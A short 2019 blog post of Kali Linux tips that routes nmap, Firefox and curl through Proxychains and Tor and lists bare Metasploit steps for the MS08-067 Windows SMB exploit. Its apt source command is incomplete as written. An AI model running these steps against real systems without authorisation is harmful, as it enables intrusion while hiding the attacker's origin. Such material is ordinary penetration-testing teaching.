Friday, January 11, 2019

Kali Usage Tips and Tricks

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.

Download Kali:

Basic Configuration Videos:

1. Use Proxychains and Tor to Visit Internet

1.1 Configure Proxychains

1.2 Install Tor
You will need to add a correct version source into /etc/apt/sorces.list file. Else your installation will fail.

echo "deb kali-rolling main contrib non-free" > /etc/apt/sources.list && apt-get update && apt-get install tor -y && apt autoremove -y

1.3 Use Proxychains to access Internet

You can run a nmap scan using Proxychains which will force the scan to run through one of the proxies in your list by typing in the following command into terminal:

proxychains nmap

You can also test Proxychains with Firefox:

proxychains firefox

proxychains curl

YouTube Video:

2. Use Nmap to scan targets

3. MSF - Metaspoit 
3.1 search smb
3.2 use exploit/windows/smb/ms08_067_netapi
3.3 show options
3.4 set RHOST
3.5 set target 41
3.6 exploit

YouTube - Kali Metasploit Exploit FTP Service on VSFTPD:

1. tor instaling

No comments:

Post a Comment